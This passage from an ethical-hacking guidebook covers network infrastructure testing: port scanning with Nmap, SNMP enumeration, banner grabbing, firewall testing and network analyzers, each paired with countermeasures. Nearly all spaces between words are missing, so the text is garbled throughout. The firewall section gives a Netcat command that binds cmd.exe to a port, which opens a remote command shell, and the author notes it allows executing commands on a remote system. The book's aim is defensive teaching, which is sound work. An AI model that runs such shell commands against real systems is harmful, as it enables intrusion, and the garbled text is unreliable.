LinuxandUNIXThefollowingcountermeasurescanhelppreventpasswordcracksonLinuxandUNIXsystems:
EnsurethatyoursystemisusingshadowedMD5passwords.
Helppreventthecreationofweakpasswords.Youcanuseeitherthebuilt-inoperatingsystempasswordfiltering(suchascracklibinLinux)orapassword-auditingprogram(suchasnpasswdorpasswd+).Checkyour/etc/passwdfileforduplicaterootUIDentries.Hackerscanexploitsuchentriestogainbackdooraccess.
Chapter13explainstheLinuxhacksandhowtotestLinuxsystemsforvulnerabilities.
HackingNetworkHosts
Readmoreabouthowyoucanfindtheareasofyournetworkthatarecreatingbusinessrisksatwww.dummies.com/extras/hacking.
Inthispart…Nowthatyou’reoffandrunningwithyoursecuritytests,it’stimetotakethingstoanewlevel.Thetestsinthepreviouspart—atleastthesocialengineeringandphysicalsecuritytests—startatahighlevelandarenotthattechnical.Times,theyarea-changin’!Younowneedtolookatnetworksecurity.Thisiswherethingsstartgettingmoreinvolved.
Thispartstartsbylookingatthenetworkfromtheinsideandtheoutsideforperimetersecurityholes,networkdeviceexploits,DoSvulnerabilities,andmore.ThispartthenlooksathowtoassessthesecurityofwirelessLANsthatintroducesomeserioussecurityvulnerabilitiesintonetworksthesedays.Finally,thispartdelvesintotheever-growingnumberofmobiledevicesthatemployeesusetoconnecttothenetworkastheyplease.
NetworkInfrastructureSystemsInThisChapter
Selectingtools
Scanningnetworkhosts
Assessingsecuritywithanetworkanalyzer
Preventingdenial-of-serviceandinfrastructurevulnerabilities
Tohavesecureoperatingsystemsandapplications,youneedasecurenetwork.Devicessuchasrouters,firewalls,andevengenericnetworkhosts(includingserversandworkstations)mustbeassessedaspartofthesecuritytestingprocess.
Therearethousandsofpossiblenetworkvulnerabilities,equallyasmanytools,andevenmoretestingtechniques.Youprobablydon’thavethetimeorresourcesavailabletotestyournetworkinfrastructuresystemsforallpossiblevulnerabilities,usingeverytoolandmethodimaginable.Instead,youneedtofocusonteststhatwillproduceagoodoverallassessmentofyournetwork—andthetestsIdescribeinthischapterproduceexactlythat.
Youcaneliminatemanywell-known,network-relatedvulnerabilitiesbysimplypatchingyournetworkhostswiththelatestvendorsoftwareandfirmwareupdates.Becausemanynetworkinfrastructuresystemsaren’tpubliclyaccessible,oddsaregoodthatyournetworkhostswillnotbeattackedfromtheoutside.Youcaneliminatemanyothervulnerabilitiesbyfollowingsomesolidsecuritypracticesonyournetwork,asdescribedinthischapter.Thetests,tools,andtechniquesoutlinedinthischapterofferthemostbangforyoursecurityassessmentbuck.
Thebetteryouunderstandnetworkprotocols,theeasiernetworkvulnerabilitytestingisbecausenetworkprotocolsarethefoundationformostinformationsecurityconcepts.Ifyou’realittlefuzzyonhownetworkswork,IhighlyencourageyoutoreadTCP/IPForDummies,6thEdition,byCandaceLeidenandMarshallWilensky.TCP/IPForDummiesisoneoftheoriginalbooksthathelpedmedevelopmyfoundationofnetworkingconceptsearlyon.TheRequestforComments(RFCs)listontheOfficialInternetProtocolStandardspage,www.rfc-editor.org/search/standards.php,isagoodreferenceaswell.
UnderstandingNetworkInfrastructureVulnerabilities
Networkinfrastructurevulnerabilitiesarethefoundationformosttechnicalsecurityissuesinyourinformationsystems.Theselower-levelvulnerabilitiesaffectpracticallyeverythingrunningonyournetwork.That’swhyyouneedtotestforthemandeliminatethemwheneverpossible.
Yourfocusforsecuritytestsonyournetworkinfrastructureshouldbetofindweaknessesthatotherscanseeinyournetworksoyoucanquantifyandtreatyournetwork’slevelofexposure.
Manyissuesarerelatedtothesecurityofyournetworkinfrastructure.Someissuesaremoretechnicalandrequireyoutousevarioustoolstoassessthemproperly.Youcanassessotherswithagoodpairofeyesandsomelogicalthinking.Someissuesareeasytoseefromoutsidethenetwork,andothersareeasiertodetectfrominsideyournetwork.
Whenyouassessyourcompany’snetworkinfrastructuresecurity,youneedtolookatthefollowing:
Wheredevices,suchasafirewalloranIPS,areplacedonthenetworkandhowthey’reconfiguredWhatexternalattackersseewhentheyperformportscansandhowtheycanexploitvulnerabilitiesinyournetworkhostsNetworkdesign,suchasInternetconnections,remoteaccesscapabilities,layereddefenses,andplacementofhostsonthenetworkInteractionofinstalledsecuritydevices,suchasfirewalls,intrusionpreventionsystems(IPSs),antivirus,andsoonWhatprotocolsareinuse,includingknownvulnerableonessuchasSecureSocketsLayer(SSL)CommonlyattackedportsthatareunprotectedNetworkhostconfigurationsNetworkmonitoringandmaintenance
Ifsomeoneexploitsavulnerabilityinoneoftheitemsintheprecedinglistoranywhereinyournetwork’ssecurity,badthingscanhappen:
Anattackercanlaunchadenialofservice(DoS)attack,whichcantakedownyourInternetconnection—oryourentirenetwork.
Amaliciousemployeeusinganetworkanalyzercanstealconfidentialinformationine-mailsandfilessentoverthenetwork.Ahackercansetupback-dooraccessintoyournetwork.Acontractorcanattackspecifichostsbyexploitinglocalvulnerabilitiesacrossthenetwork.
Beforeassessingyournetworkinfrastructuresecurity,remembertodothefollowing:
Testyoursystemsfromtheoutsidein,andtheinsidein(thatis,onandbetweeninternalnetworksegmentsanddemilitarizedzones[DMZs]).Obtainpermissionfrompartnernetworkstocheckforvulnerabilitiesontheirsystemsthatcanaffectyournetwork’ssecurity,suchasopenports,lackofafirewall,oramisconfiguredrouter.
ChoosingToolsAswithallsecurityassessments,yournetworksecuritytestsrequiretherighttools—youneedportscanners,protocolanalyzers,andvulnerabilityassessmenttools.Greatcommercial,shareware,andfreewaretoolsareavailable.Idescribeafewofmyfavoritetoolsinthefollowingsections.Justkeepinmindthatyouneedmorethanonetoolbecausenotooldoeseverythingyouneed.
Ifyou’relookingforeasy-to-usesecuritytoolswithall-in-onepackaging,yougetwhatyoupayformostofthetime—especiallyfortheWindowsplatform.Tonsofsecurityprofessionalsswearbymanyfreesecuritytools,especiallythosethatrunonLinuxandotherUNIX-basedoperatingsystems.Manyofthesetoolsofferalotofvalue—ifyouhavethetime,patience,andwillingnesstolearntheirinsandouts.It’dbehooveyoutocomparetheresultsofthefreetoolswiththatoftheircommercialcounterparts.I’vedefinitelyfoundsomebenefitstousingthelatter.
ScannersandanalyzersThesescannersprovidepracticallyalltheportscanningandnetworktestingyouneed:
Cain&Abel(www.oxid.it/cain.html)fornetworkanalysisandARPpoisoningEssentialNetTools(www.tamos.com/products/nettools)forawidevarietyofnetworkscanningfunctionalityNetScanToolsPro(www.netscantools.com)fordozensofnetworksecurityassessmentfunctions,includingpingsweeps,portscanning,andSMTPrelaytestingGetif(www.wtcs.org/snmp4tpc/getif.htm)anoldiebutgoodietoolforSNMPenumerationNmap(http://nmap.org)—orNMapWin(http://sourceforge.net/projects/nmapwin),thehappy-clicky-GUIfrontendtoNmap—forhost-portprobingandoperatingsystemfingerprintingSavviusOmniPeek(www.savvius.com)fornetworkanalysisWireshark(www.wireshark.org)fornetworkanalysis
VulnerabilityassessmentThesevulnerabilityassessmenttools,amongothers,allowyoutotestyournetworkhostsforvariousknownvulnerabilitiesaswellaspotentialconfigurationissuesthatcouldleadtosecurityexploits:
GFILanGuard(www.gfi.com/products-and-solutions/network-security-solutions/gfi-languard)forportscanningandvulnerabilitytestingNexpose(www.rapid7.com/vulnerability-scanner.jsp),anall-in-onetoolforin-depthvulnerabilitytesting
Scanning,Poking,andProddingtheNetwork
Performingtheethicalhacksdescribedinthefollowingsectionsonyournetworkinfrastructureinvolvesfollowingbasichackingsteps:
1. Gatherinformationandmapyournetwork.2. Scanyoursystemstoseewhichonesareavailable.3. Determinewhat’srunningonthesystemsdiscovered.4. Attempttopenetratethesystemsdiscoveredifyouchooseto.
EverynetworkcarddriverandimplementationofTCP/IPinmostoperatingsystems,includingWindowsandLinux,andeveninyourfirewallsandrouters,hasquirksthatresultindifferentbehaviorswhenscanning,poking,andproddingyoursystems.Thiscanresultindifferentresponsesfromyourvarioussystems,includingeverythingfromfalse-positivefindingstodenialofservice(DoS)conditions.Refertoyouradministratorguidesorvendorwebsitesfordetailsonanyknownissuesandpossiblepatchesthatareavailabletofixthoseissues.Ifyoupatchedallyoursystems,youshouldn’thaveanyissues—justknowthatanything’spossible.
ScanningportsAportscannershowsyouwhat’swhatonyournetworkbyscanningthenetworktoseewhat’saliveandworking.Portscannersprovidebasicviewsofhowthenetworkislaidout.Theycanhelpidentifyunauthorizedhostsorapplicationsandnetworkhostconfigurationerrorsthatcancauseserioussecurityvulnerabilities.
Thebig-pictureviewfromportscannersoftenuncoverssecurityissuesthatmightotherwisegounnoticed.Portscannersareeasytouseandcantestnetworkhostsregardlessofwhatoperatingsystemsandapplicationsthey’rerunning.Thetestsareusuallyperformedrelativelyquicklywithouthavingtotouchindividualnetworkhosts,whichwouldbearealpainotherwise.
Thetricktoassessingyouroverallnetworksecurityisinterpretingtheresultsyougetfromaportscan.Youcangetfalsepositivesonopenports,andyoumighthavetodigdeeper.Forexample,UserDatagramProtocol(UDP)scans—liketheprotocolitself—arelessreliablethanTransmissionControlProtocol(TCP)scansandoftenproducefalsepositivesbecausemanyapplicationsdon’tknowhowtorespondtorandomincomingUDPrequests.
Afeature-richscannersuchasNexposeoftencanidentifyportsandseewhat’srunning
inonestep.
Portscanscantakeagoodbitoftime.Thelengthoftimedependsonthenumberofhostsyouhave,thenumberofportsyouscan,thetoolsyouuse,theprocessingpowerofyourtestsystem,andthespeedofyournetworklinks.
Animportanttenettorememberisthatyouneedtoscanmorethanjusttheimportanthosts.Leavenostoneunturned—ifnotatfirst,theneventually.Theseothersystemsoftenbiteyouifyouignorethem.Also,performthesametestswithdifferentutilitiestoseewhetheryougetdifferentresults.Notalltoolsfindthesameopenportsandvulnerabilities.Thisisunfortunate,butit’sarealityofethicalhackingtests.
Ifyourresultsdon’tmatchafteryourunthetestsusingdifferenttools,youmightwanttoexploretheissuefurther.Ifsomethingdoesn’tlookright—suchasastrangesetofopenports—itprobablyisn’t.Testagain;ifyou’reindoubt,useanothertoolforadifferentperspective.
Ifpossible,youshouldscanall65,534TCPportsoneachnetworkhostthatyourscannerfinds.Ifyoufindquestionableports,lookfordocumentationthattheapplicationisknownandauthorized.It’snotabadideatoscanall65,534UDPportsaswell.Justknowthiscanaddaconsiderableamountoftimetoyourscans.
Forspeedandsimplicity,youcanscanthecommonlyhackedports,listedinTable9-1.
Table9-1CommonlyHackedPorts
PortNumber Service Protocol(s)
7 Echo TCP,UDP
19 Chargen TCP,UDP
20 FTPdata(FileTransferProtocol) TCP
21 FTPcontrol TCP
22 SSH TCP
23 Telnet TCP
25 SMTP(SimpleMailTransferProtocol) TCP
37 Time TCP,UDP
53 DNS(DomainNameSystem) UDP
69 TFTP(TrivialFileTransferProtocol) UDP
79 Finger TCP,UDP
80 HTTP(HypertextTransferProtocol) TCP
110 POP3(PostOfficeProtocolversion3) TCP
111 SUNRPC(remoteprocedurecalls) TCP,UDP
135 RPC/DCE(endpointmapper)forMicrosoftnetworks TCP,UDP
137,138,139,445 NetBIOSoverTCP/IP TCP,UDP
161 SNMP(SimpleNetworkManagementProtocol) TCP,UDP
443 HTTPS(HTTPoverTLS) TCP
512,513,514 Berkeleyr-servicesandr-commands(suchasrsh,rexec,andrlogin) TCP
1433 MicrosoftSQLServer(ms-sql-s) TCP,UDP
1434 MicrosoftSQLMonitor(ms-sql-m) TCP,UDP
1723 MicrosoftPPTPVPN TCP
3389 WindowsTerminalServer TCP
8080 HTTPproxy TCP
PingsweepingApingsweepofallyournetworksubnetsandhostsisagoodwaytofindoutwhichhostsarealiveandkickingonthenetwork.ApingsweepiswhenyoupingarangeofaddressesusingInternetControlMessageProtocol(ICMP)packets.Figure9-1showsthecommandandtheresultsofusingNmaptoperformapingsweepofaclassCsubnetrange.
Figure9-1:PerformingapingsweepofanentireclassCnetworkwithNmap.
DozensofNmapcommandlineoptionsexist,whichcanbeoverwhelmingwhenyouwantonlyabasicscan.Nonetheless,youcanenternmaponthecommandlinetoseealltheoptionsavailable.
ThefollowingcommandlineoptionscanbeusedforanNmappingsweep:
-sPtellsNmaptoperformapingscan.-ntellsNmapnottoperformnameresolution.-T4tellsNmaptoperformanaggressive(faster)scan.
192.168.1.1-254tellsNmaptoscantheentire192.168.1.0subnet.
UsingportscanningtoolsMostportscannersoperateinthreesteps:
1. TheportscannersendsTCPSYNrequeststothehostorrangeofhostsyousetittoscan.
SomeportscannersperformpingsweepstodeterminewhichhostsareavailablebeforestartingtheTCPportscans.
MostportscannersbydefaultscanonlyTCPports.Don’tforgetaboutUDPports.YoucanscanUDPportswithaUDPportscanner,suchasNmap.
2. Theportscannerwaitsforrepliesfromtheavailablehosts.3. Theportscannerprobestheseavailablehostsforupto65,534possibleTCPand
UDPports—basedonwhichportsyoutellittoscan—toseewhichoneshaveavailableservicesonthem.
Theportscansprovidethefollowinginformationaboutthelivehostsonyournetwork:
HoststhatareactiveandreachablethroughthenetworkNetworkaddressesofthehostsfoundServicesorapplicationsthatthehostsmayberunning
Afterperformingagenericsweepofthenetwork,youcandigdeeperintospecifichostsyoufind.
Nmap
Afteryouhaveageneralideaofwhathostsareavailableandwhatportsareopen,youcanperformfancierscanstoverifythattheportsareactuallyopenandnotreturningafalsepositive.Nmapallowsyoutorunthefollowingadditionalscans:
Connect:ThisbasicTCPscanlooksforanyopenTCPportsonthehost.Youcanusethisscantoseewhat’srunninganddeterminewhetherintrusionpreventionsystems(IPSs),firewalls,orotherloggingdeviceslogtheconnections.UDPscan:ThisbasicUDPscanlooksforanyopenUDPportsonthehost.Youcanusethisscantoseewhat’srunninganddeterminewhetherIPSs,firewalls,orotherloggingdeviceslogtheconnections.SYNStealth:Thisscancreatesahalf-openTCPconnectionwiththehost,possiblyevadingIPSsystemsandlogging.ThisisagoodscanfortestingIPSs,firewalls,andotherloggingdevices.FINStealth,XmasTree,andNull:Thesescansletyoumixthingsupabitby
sendingstrangelyformedpacketstoyournetworkhostssoyoucanseehowtheyrespond.ThesescanschangearoundtheflagsintheTCPheadersofeachpacket,whichallowsyoutotesthoweachhosthandlesthemtopointoutweakTCP/IPimplementationsaswellaspatchesthatmightneedtobeapplied.
Becarefulwhenperformingthesescans.YoucancreateyourownDoSattackandpotentiallycrashapplicationsorentiresystems.Unfortunately,ifyouhaveahostwithaweakTCP/IPstack(thesoftwarethatcontrolsTCP/IPcommunicationsonyourhosts),there’snogoodwaytopreventyourscanfromcreatingaDoSattack.AgoodwaytohelpreducethechanceofthisoccurringistousetheslowNmaptimingoptions—Paranoid,Sneaky,orPolite—whenrunningyourscans.
Figure9-2showstheNMapWinScantab,whereyoucanselecttheScanModeoptions(Connect,UDPScan,andsoon).Ifyou’reacommandlinefan,youseethecommandlineparametersdisplayedinthelower-leftcorneroftheNMapWinscreen.Thishelpswhenyouknowwhatyouwanttodoandthecommandlinehelpisn’tenough.
Figure9-2:In-depthport-scanningoptionsinNMapWin.
Ifyouconnecttoasingleport(asopposedtoseveralallatonetime)withoutmakingtoomuchnoise,youmightbeabletoevadeyourfirewallorIPS.Thisisa
goodtestofyournetworksecuritycontrols,solookatyourlogstoseewhattheysawduringthisprocess.
NetScanToolsPro
NetScanToolsPro(www.netscantools.com)isaveryniceall-in-onecommercialtoolforgatheringgeneralnetworkinformation,suchasthenumberofuniqueIPaddresses,NetBIOSnames,andMACaddresses.Italsohasaneatfeaturethatallowsyoutofingerprinttheoperatingsystemsofvarioushosts.Figure9-3showstheOSFingerprintingresultswhilescanningawirelessnetworkaccesspoint.
Figure9-3:NetScanToolsProOSFingerprintingtool.
CountermeasuresagainstpingsweepingandportscanningEnableonlythetrafficyouneedtoaccessinternalhosts—preferablyasfaraspossiblefromthehostsyou’retryingtoprotect—anddenyeverythingelse.Thisgoesforstandardports,suchasTCP80forHTTPandICMPforpingrequests.
Configurefirewallstolookforpotentiallymaliciousbehaviorovertime(suchasthenumberofpacketsreceivedinacertainperiodoftime)andhaverulesinplacetocutoffattacksifacertainthresholdisreached,suchas10portscansinoneminuteor100consecutiveping(ICMP)requests.
MostfirewallsandIPSscandetectsuchscanningandcutitoffinrealtime.
Youcanbreakapplicationsonyournetworkwhenrestrictingnetworktraffic,somakesurethatyouanalyzewhat’sgoingonandunderstandhowapplications
andprotocolsareworkingbeforeyoudisableanytypeofnetworktraffic.
ScanningSNMPSimpleNetworkManagementProtocol(SNMP)isbuiltintovirtuallyeverynetworkdevice.Networkmanagementprograms(suchasHPOpenViewandLANDesk)useSNMPforremotenetworkhostmanagement.Unfortunately,SNMPalsopresentssecurityvulnerabilities.
VulnerabilitiesTheproblemisthatmostnetworkhostsrunSNMPenabledwiththedefaultread/writecommunitystringsofpublic/private.ThemajorityofnetworkdevicesIcomeacrosshaveSNMPenabledanddon’tevenneedit.
IfSNMPiscompromised,ahackermaybeabletogathersuchnetworkinformationasARPtables,usernames,andTCPconnectionstoattackyoursystemsfurther.IfSNMPshowsupinportscans,youcanbetthatamaliciousattackerwilltrytocompromisethesystem.
HerearesomeutilitiesforSNMPenumeration:
ThecommercialtoolsNetScanToolsProandEssentialNetToolsFreeWindowsGUI-basedGetifFreeWindowstext-basedSNMPUTIL(www.wtcs.org/snmp4tpc/FILES/Tools/SNMPUTIL/SNMPUTIL.zip)
YoucanuseGetiftoenumeratesystemswithSNMPenabled,asshowninFigure9-4.
Figure9-4:GeneralSNMPinformationgatheredbyGetif.
Inthistest,Iwasabletogleanalotofinformationfromawirelessaccesspoint,includingmodelnumber,firmwarerevision,andsystemuptime.Allthiscouldbeusedagainstthehostifanattackerwantedtoexploitaknownvulnerabilityinthisparticular
system.Bydigginginfurther,Iwasabletodiscoverseveralmanagementinterfaceusernamesonthisaccesspoint,asshowninFigure9-5.Youcertainlydon’twanttoshowtheworldthisinformation.
Figure9-5:ManagementinterfaceuserIDsgleanedviaGetif’sSNMPbrowsingfunction.
Foralistofvendorsandproductsaffectedbythewell-knownSNMPvulnerabilities,refertowww.cert.org/historical/advisories/CA-2002-03.cfm.
CountermeasuresagainstSNMPattacks
PreventingSNMPattackscanbeassimpleasA-B-C:
AlwaysdisableSNMPonhostsifyou’renotusingit—period.BlocktheSNMPports(UDPports161and162)atthenetworkperimeter.ChangethedefaultSNMPcommunityreadstringfrompublicandthedefaultcommunitywritestringfromprivatetoanotherlongandcomplexvaluethat’svirtuallyimpossibletoguess.
There’stechnicallya“U”that’spartofthesolution:upgrade.Upgradingyoursystems(atleasttheonesyoucan)toSNMPversion3canresolvemanyofthewell-knownSNMPsecurityweaknesses.
GrabbingbannersBannersarethewelcomescreensthatdivulgesoftwareversionnumbersandothersysteminformationonnetworkhosts.Thisbannerinformationmightidentifytheoperatingsystem,theversionnumber,andthespecificservicepackstogivethebad
guysaleguponattackingthenetwork.YoucangrabbannersbyusingeithergoodoldtelnetorsomeofthetoolsImention,suchasNmapandSuperScan.
telnetYoucantelnettohostsonthedefaulttelnetport(TCPport23)toseewhetheryou’representedwithaloginpromptoranyotherinformation.JustenterthefollowinglineatthecommandpromptinWindowsorUNIX:
telnetip_address
Youcantelnettoothercommonlyusedportswiththesecommands:
SMTP:telnetip_address25HTTP:telnetip_address80POP3:telnetip_address110
Figure9-6showsspecificversioninformationaboutanIceWarpe-mailserverwhentelnettingtoitonport25.Forhelpwithtelnet,simplyentertelnet/?ortelnethelpforspecificguidanceonusingtheprogram.
Figure9-6:Informationgatheredaboutane-mailserverviatelnet.
Countermeasuresagainstbanner-grabbingattacksThefollowingstepscanreducethechanceofbanner-grabbingattacks:
Ifthereisn’tabusinessneedforservicesthatofferbannerinformation,disablethoseunusedservicesonthenetworkhost.Ifthereisn’tabusinessneedforthedefaultbanners,orifyoucancustomizethebanners,configurethenetworkhost’sapplicationoroperatingsystemtoeitherdisablethebannersorremoveinformationfromthebannersthatcouldgiveanattackeralegup.Checkwithyourspecificvendorforinformationonhowtodothis.TCPWrappersinLinuxisanothersolution.
Ifyoucancustomizeyourbanners,checkwithyourlawyeraboutaddingawarningbanner.Itwon’tstopbannergrabbingbutwillshowwould-beintrudersthatthesystemisprivateandmonitored(assumingittrulyis).Awarningbannermayalsohelpreduceyourbusinessliabilityintheeventofasecuritybreach.Here’sanexample:
Warning!Thisisaprivatesystem.Alluseismonitoredandrecorded.Anyunauthorizeduseofthissystemmayresultinciviland/orcriminalprosecutiontothefullestextentofthelaw.
TestingfirewallrulesAspartofyourethicalhacking,youcantestyourfirewallrulestomakesurethey’reworkingasthey’resupposedto.
TestingAfewtestscanverifythatyourfirewallactuallydoeswhatitsaysit’sdoing.Youcanconnectthroughthefirewallontheportsthatareopen,butwhatabouttheportsthatcanbeopenbutshouldn’tbe?
Netcat
Netcat(http://netcat.sourceforge.net)cantestcertainfirewallruleswithouthavingtotestaproductionsystemdirectly.Forexample,youcancheckwhetherthefirewallallowsport23(telnet)through.Followthesestepstoseewhetheraconnectioncanbemadethroughport23:
1. LoadNetcatonaclientmachineinsidethenetwork.
Thissetsuptheoutboundconnection.
2. LoadNetcatonatestingcomputeroutsidethefirewall.
Thisallowsyoutotestfromtheoutsidein.
3. EntertheNetcatlistenercommandontheclient(internal)machinewiththeportnumberyou’retesting.
Forexample,ifyou’retestingport23,enterthiscommand:nc–l–p23cmd.exe
4. EntertheNetcatcommandtoinitiateaninboundsessiononthetesting(external)machine.Youmustincludethefollowinginformation:
TheIPaddressoftheinternalmachineyou’retestingTheportnumberyou’retesting
Forexample,iftheIPaddressoftheinternal(client)machineis10.11.12.2andthe
portis23,enterthiscommand:nc–v10.11.12.223
IfNetcatpresentsyouwithanewcommandprompt(that’swhatthecmd.exeisforinStep3)ontheexternalmachine,you’veconnectedandcanexecutecommandsontheinternalmachine!Thiscanserveseveralpurposes,includingtestingfirewallrules,networkaddresstranslation(NAT),portforwardingand—well,uhhhmmm—executingcommandsonaremotesystem!
AlgoSecFirewallAnalyzer
AcommercialtoolIoftenusewithgreatresultsisAlgoSec’sFirewallAnalyzer(www.algosec.com)asshowninFigure9-7.
Figure9-7:UsingAlgoSecFirewallAnalyzertouncoversecuritygaffesinafirewallrulebase.
AlgoSecFirewallAnalyzer,andsimilaronessuchasSolarWindsFirewallSecurityManager(www.solarwinds.com/firewall-security-manager.aspx),allowsyoutoperformanin-depthanalysisoffirewallrulebasesfromallthemajorvendorsandfindsecurityflawsandinefficienciesyou’dneveruncoverotherwise.Firewallrulebaseanalysisisalotlikesoftwaresourcecodeanalysis—itfindsflawsatthesourcethathumanswouldlikelyneverseeevenwhenperformingin-depthsecuritytestsfromtheInternetandtheinternalnetwork.Ifyou’veneverperformedafirewallrulebaseanalysis,it’samust!
CountermeasuresagainstfirewallrulebasevulnerabilitiesThefollowingcountermeasurescanpreventahackerfromtestingyourfirewall:
Performafirewallrulebaseaudit.I’malwayssayingthatyoucannotsecurewhatyoudon’tacknowledge.There’snobetterexampleofthisthanyourfirewallrulebases.Nomatterhowseeminglysimplisticyourrulebaseis,itneverhurtstoverifyyourworkusinganautomatedtool.
Limittraffictowhat’sneeded.
Setrulesonyourfirewall(androuter,ifneeded)thatpassesonlytrafficthatabsolutelymustpass.Forexample,haverulesinplacethatallowHTTPinboundtraffictoaninternalwebserver,SMTPinboundtraffictoane-mailserver,andHTTPoutboundtrafficforexternalwebaccess.
Thisisthebestdefenseagainstsomeonepokingatyourfirewall.
BlockICMPtohelppreventanexternalattackerfrompokingandproddingyournetworktoseewhichhostsarealive.Enablestatefulpacketinspectiononthefirewalltoblockunsolicitedrequests.
AnalyzingnetworkdataAnetworkanalyzerisatoolthatallowsyoutolookintoanetworkandanalyzedatagoingacrossthewirefornetworkoptimization,security,and/ortroubleshootingpurposes.Likeamicroscopeforalabscientist,anetworkanalyzerisamust-havetoolforanysecurityprofessional.
Networkanalyzersareoftengenericallyreferredtoassniffers,thoughthat’sactuallythenameandtrademarkofaspecificproductfromNetworkAssociates’originalSniffernetworkanalysistool.
Anetworkanalyzerishandyforsniffingpacketsonthewire.Anetworkanalyzerissimplysoftwarerunningonacomputerwithanetworkcard.Itworksbyplacingthenetworkcardinpromiscuousmode,whichenablesthecardtoseeallthetrafficonthenetwork,eventrafficnotdestinedforthenetworkanalyzer’shost.Thenetworkanalyzerperformsthefollowingfunctions:
CapturesallnetworktrafficInterpretsordecodeswhatisfoundintoahuman-readableformatDisplaysthecontentinchronologicalorder(orhoweveryouchoosetoseeit)
Whenassessingsecurityandrespondingtosecurityincidents,anetworkanalyzercanhelpyou
Viewanomalousnetworktrafficandeventrackdownanintruder.
Developabaselineofnetworkactivityandperformance,suchasprotocolsinuse,usagetrends,andMACaddresses,beforeasecurityincidentoccurs.
Whenyournetworkbehaveserratically,anetworkanalyzercanhelpyou
TrackandisolatemaliciousnetworkusageDetectmaliciousTrojanhorseapplicationsMonitorandtrackdownDoSattacks
NetworkanalyzerprogramsYoucanuseoneofthefollowingprogramsfornetworkanalysis:
SavviusOmniPeek(www.savvius.com)isoneofmyfavoritenetworkanalyzers.ItdoeseverythingIneedandmoreandisverysimpletouse.OmniPeekisavailableforWindowsoperatingsystems.TamoSoft’sCommView(www.tamos.com/products/commview)isagreat,low-cost,Windows-basedalternative.Cain&Abel(www.oxid.it/cain.html)isafreemultifunctionalpasswordrecoverytoolforperformingARPpoisoning,capturingpackets,crackingpasswords,andmore.Wireshark(www.wireshark.org),formerlyknownasEthereal,isafreealternative.IdownloadandusethistoolifIneedaquickfixanddon’thavemylaptopnearby.It’snotasuser-friendlyasmostofthecommercialproducts,butitisverypowerfulifyou’rewillingtolearnitsinsandouts.WiresharkisavailableforbothWindowsandOSX.ettercap(http://ettercap.github.io/ettercap/)isanotherpowerful(andfree)utilityforperformingnetworkanalysisandmuchmoreonWindows,Linux,andotheroperatingsystems.
Hereareafewcaveatsforusinganetworkanalyzer:
Tocapturealltraffic,youmustconnecttheanalyzertooneofthefollowing:AhubonthenetworkAmonitor/span/mirrorportonaswitchAswitchthatyou’veperformedanARPpoisoningattackon
Ifyouwanttoseetrafficsimilartowhatanetwork-basedIPSsees,youshouldconnectthenetworkanalyzertoahuborswitchmonitorport—orevenanetworktap—ontheoutsideofthefirewall,asshowninFigure9-8.Thisway,yourtesting
enablesyoutoviewWhat’senteringyournetworkbeforethefirewallfilterseliminatethejunktraffic.What’sleavingyournetworkafterthetrafficpassesthroughthefirewall.
Figure9-8:Connectinganetworkanalyzeroutsidethefirewall.
Whetheryouconnectyournetworkanalyzerinsideoroutsideyourfirewall,youseeimmediateresults.Itcanbeanoverwhelmingamountofinformation,butyoucanlookfortheseissuesfirst:
Oddtraffic,suchas:AnunusualamountofICMPpacketsExcessiveamountsofmulticastorbroadcasttrafficProtocolsthataren’tpermittedbypolicyorshouldn’texistgivenyourcurrentnetworkconfiguration
Internetusagehabits,whichcanhelppointoutmaliciousbehaviorofarogueinsiderorsystemthathasbeencompromised,suchas:
WebsurfingandsocialmediaE-mailInstantmessagingandotherP2Psoftware
Questionableusage,suchas:Manylostoroversizedpackets,indicatinghackingtoolsormalwarearepresentHighbandwidthconsumptionthatmightpointtoaweborFTPserverthatdoesn’tbelong
Reconnaissanceprobesandsystemprofilingfromportscannersandvulnerabilityassessmenttools,suchasasignificantamountofinboundtrafficfromunknownhosts—especiallyoverportsthataren’tusedverymuch,suchasFTPortelnet.
Hackinginprogress,suchastonsofinboundUDPorICMPechorequests,SYNfloods,orexcessivebroadcasts.Nonstandardhostnamesonyournetwork.Forexample,ifyoursystemsarenamedComputer1,Computer2,andsoon,acomputernamedGEEKz4evURshouldraisearedflag.Hiddenservers(especiallyweb,SMTP,FTP,DNS,andDHCP)thatmightbeeatingnetworkbandwidth,servingillegalsoftware,oraccessingyournetworkhosts.Attacksonspecificapplicationsthatshowsuchcommandsas/bin/rm,/bin/ls,echo,andcmd.exeaswellasSQLqueriesandJavaScriptinjection,whichIcoverinChapter15.
Youmightneedtoletyournetworkanalyzerrunforquiteawhile—severalhourstoseveraldays,dependingonwhatyou’relookingfor.Beforegettingstarted,configureyournetworkanalyzertocaptureandstorethemostrelevantdata:
Ifyournetworkanalyzerpermitsit,configureittouseafirst-in,first-outbuffer.
Thisconfigurationoverwritestheoldestdatawhenthebufferfillsup,butitmightbeyouronlyoptionifmemoryandharddrivespacearelimitedonyournetworkanalysiscomputer.
Ifyournetworkanalyzerpermitsit,recordallthetrafficintoacapturefileandsaveittotheharddrive.Thisistheidealscenario—especiallyifyouhavealargeharddrive,suchas500GBormore.
Youcaneasilyfillseveralhundredgigabytes’worthofharddrivespaceinashortperiod.IhighlyrecommendrunningyournetworkanalyzerinwhatOmniPeekcallsmonitormode.Thisallowstheanalyzertokeeptrackofwhat’shappeningsuchasnetworkusageandprotocolsbutnotcaptureandstoreeverysinglepacket.Monitormode—ifsupportedbyyouranalyzer—isverybeneficialandisoftenallyouneed.
Whennetworktrafficdoesn’tlookrightinanetworkanalyzer,itprobablyisn’t.It’sbettertobesafethansorry.
Runabaselinewhenyournetworkisworkingnormally.Whenyouhaveabaseline,youcanseeanyobviousabnormalitieswhenanattackoccurs.
OnethingIliketocheckforisthetoptalkers(networkhostssending/receivingthemosttraffic)onthenetwork.Ifsomeoneisdoingsomethingmaliciousonthenetwork,suchashostinganFTPserverorrunningInternetfile-sharingsoftware,usinganetworkanalyzerisoftentheonlywayyou’llfindoutaboutit.Anetworkanalyzerisalsoagoodtoolfordetectingsystemsinfectedwithmalware,suchasavirusorTrojanhorse.Figure9-9showswhatitlooksliketohaveasuspectprotocolorapplicationrunningonyournetwork.
Figure9-9:OmniPeekcanhelpuncoversomeonerunninganillicitsystem,suchasanFTPserver.
Lookingatyournetworkstatistics,suchasbytespersecond,networkutilization,andinbound/outboundpacketcounts,isalsoagoodwaytodeterminewhethersomethingfishyisgoingon.Figure9-10containsnetworkstatisticsasseenthroughthepowerfulCommViewnetworkanalyzer.
Figure9-10:CommView’sinterfaceforviewingnetworkstatistics.
